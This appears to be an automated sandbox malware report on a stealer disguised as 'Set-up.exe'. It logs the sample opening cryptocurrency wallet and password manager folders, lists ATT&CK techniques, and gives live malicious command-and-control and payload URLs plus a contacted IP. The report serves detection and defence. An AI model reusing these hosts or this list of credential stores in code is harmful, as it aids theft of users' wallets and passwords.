Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Daedalus Mainnet\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Daedalus Mainnet\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Daedalus Mainnet\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Daedalus Mainnet\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Daedalus Mainnet\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Ledger Live	Jump to behavior

Tries to steal from password manager

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Local\1Password\data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Local\1Password\data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\1Password\data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Bitwarden	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Bitwarden	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Bitwarden	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\NordPass	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\NordPass	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Local\1Password\data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Bitwarden	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Bitwarden	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\NordPass	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\NordPass	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\NordPass	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Local\1Password\data	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\Default\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\Default\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\Default\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\Default\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\Default\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\Default\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\TQDGENUHWP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\TQDGENUHWP	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\Public\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\Public\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\Public\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\Public\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\Public\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\Public\Documents	Jump to behavior

Source: Yara match	File source: 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Set-up.exe PID: 7572, type: MEMORYSTR

Remote Access Functionality

Yara detected ACR Stealer

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 7572, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	311 Process Injection	311 Process Injection	3 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Abuse Elevation Control Mechanism	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	51 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 DLL Side-Loading	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	12 System Information Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction

Source	Detection	Scanner	Link
Set-up.exe	4%	Virustotal	Browse
Set-up.exe	0%	ReversingLabs
SAMPLE	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://mcrsftuptade.pro/Up	100%	Avira URL Cloud	malware
http://www.netcrunch.tools/wmitool/	0%	Avira URL Cloud	safe
http://mcrsftuptade.pro/Up/g	100%	Avira URL Cloud	malware
http://mcrsftuptade.pro/ujs/f1575b64-8492-4e8b-b102-4d26e8c70371	100%	Avira URL Cloud	malware
http://h1.coldwalk.top/sh.ext.exe.bin	0%	Avira URL Cloud	safe
http://h1.coldwalk.top/amshm.bin	0%	Avira URL Cloud	safe
http://mcrsftuptade.pro/Up/p	100%	Avira URL Cloud	malware
http://mcrsftuptade.pro/Up/b	100%	Avira URL Cloud	malware
http://www.mygale.org/~cresto/	0%	Avira URL Cloud	safe
http://www.adremsoft.com/autoupdate/wmi.tools.json	0%	Avira URL Cloud	safe
http://www.adremsoft.com/autoupdate/wmi.tools.jsonSVWU	0%	Avira URL Cloud	safe
http://h1.coldwalk.top/shark.bin	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://mcrsftuptade.pro/ujs/f1575b64-8492-4e8b-b102-4d26e8c70371	true	Avira URL Cloud: malware	unknown
http://mcrsftuptade.pro/Up/g	true	Avira URL Cloud: malware	unknown
http://mcrsftuptade.pro/Up	true	Avira URL Cloud: malware	unknown
http://mcrsftuptade.pro/Up/p	true	Avira URL Cloud: malware	unknown
http://mcrsftuptade.pro/Up/b	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://h1.coldwalk.top/amshm.bin	Set-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://h1.coldwalk.top/sh.ext.exe.bin	Set-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	Set-up.exe	false		high
http://www.netcrunch.tools/wmitool/	Set-up.exe, 00000000.00000000.1241274498.0000000001A31000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Set-up.exe, 00000000.00000003.1420210045.0000000010385000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1553562675.000000001016D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1440653499.00000000102F5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org?q=	chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.12.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Set-up.exe, 00000000.00000003.1513427342.00000000101B8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1505147370.00000000102A8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1513181542.0000000010278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	Set-up.exe, 00000000.00000003.1420210045.0000000010385000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1553562675.000000001016D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1440653499.00000000102F5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.indyproject.org/	Set-up.exe	false		high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	Set-up.exe, 00000000.00000003.1513427342.00000000101B8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1505147370.00000000102A8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1513181542.0000000010278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/v20	Set-up.exe, 00000000.00000003.1513427342.00000000101B8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1505147370.00000000102A8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1513181542.0000000010278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.adremsoft.com/autoupdate/wmi.tools.json	Set-up.exe	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	Set-up.exe, 00000000.00000003.1420210045.0000000010385000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1553562675.000000001016D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1440653499.00000000102F5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Set-up.exe, 00000000.00000003.1420210045.0000000010385000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1553562675.000000001016D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1440653499.00000000102F5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabv20	Set-up.exe, 00000000.00000003.1513427342.00000000101B8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1505147370.00000000102A8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1513181542.0000000010278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Set-up.exe, 00000000.00000003.1513427342.00000000101B8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1505147370.00000000102A8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1513181542.0000000010278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Set-up.exe, 00000000.00000003.1420210045.0000000010385000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1553562675.000000001016D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1440653499.00000000102F5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.mygale.org/~cresto/	Set-up.exe, 00000000.00000000.1241274498.0000000001A31000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://www.adremsoft.com/autoupdate/wmi.tools.jsonSVWU	Set-up.exe	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://h1.coldwalk.top/shark.bin	Set-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	unknown	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1686586
Start date and time:	2025-05-10 08:04:17 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Set-up.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@15/25@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 39 Number of non-executed functions: 11
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.29.183.29
Excluded domains from analysis (whitelisted): a-ring-fallback.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, www.microsoft.com, casoneroutegold-prod-bggfgca0dkaag8a8.b01.azurefd.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	Set-up_patched.exe	Get hash	malicious	ACR Stealer	Browse	mcrsftuptade.pro/Up/g
	Set-up_patched.exe	Get hash	malicious	ACR Stealer	Browse	mcrsftuptade.pro/Up/g
	http://188.114.96.3	Get hash	malicious	Unknown	Browse	188.114.96.3/favicon.ico
	g1V10ssekg.exe	Get hash	malicious	FormBook	Browse	www.comebackhome.online/dv29/?UPV=lyDuWv8anyDzCsrsL6PTwCreB/WdAINc3G6wsV0rNYv9zNmSH7KTJBB1K2WfFvHvPOh/z5cHktk3l1356pnt1M3PZl4mowifUTZkIWOf1ffB0d/Fsg==&YrV=FlsDgRMx
	http://facebooksupports.tempisite.com/ils972/	Get hash	malicious	Unknown	Browse	facebooksupports.tempisite.com/favicon.ico
	AGODA COMPANY PTE LTD.exe	Get hash	malicious	FormBook	Browse	www.baurishu.info/6oy6/
	file.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.actpisalnplay.cyou/3vjo/
	RFQPO-AA132426.exe	Get hash	malicious	FormBook	Browse	www.actpisalnplay.cyou/3vjo/
	Swift copy.exe	Get hash	malicious	FormBook	Browse	www.desktitle.homes/izqs/
	http://www.brillflooring.com	Get hash	malicious	Unknown	Browse	www.brillflooring.com/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	OYNXZnHEXq.exe	Get hash	malicious	FormBook	Browse	104.21.64.1
	Eab2SbtQbr.exe	Get hash	malicious	FormBook	Browse	104.21.48.1
	A2RVVD9AhJ.exe	Get hash	malicious	FormBook	Browse	104.21.112.1
	GS4TX46Pz7.exe	Get hash	malicious	FormBook	Browse	104.21.48.1
	cdsuXkNCvF.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	nTTTS39M11.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	FjPUv889pO.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.112.1
	8MF8j3kB7J.exe	Get hash	malicious	FormBook	Browse	104.21.91.219
	LiVjGnY5Hx.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.112.1
	88ukoO6Zln.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.702028043803121
Encrypted:	false
SSDEEP:	96:d8+u6iJsrEoZGNfCQXIDcQic6ycEJcw3++HbHu2A2Z+ZwfZAX/d5FMT2SlPkpXmI:a+uJJb0c2TTj2zuiFWZ24lO89
MD5:	85B842F36425F0E179AF6F00B06087E2
SHA1:	E72612E63925A556FFC03CA2B9F456B9DA867B7D
SHA-256:	1C5C5A7B6AD24A6AD97C43A70FDF6B8F21007AD602144F8E175B1526FE9718CA
SHA-512:	DD050DE37584A145A356D68D6D2725CFA7962546C70214CDC686E73E125D07E8A684B8D926C0751F5EA999D481C74721E38376EC725CBD94045DCD87B9EBDB6D
Malicious:	false
Reputation:	low
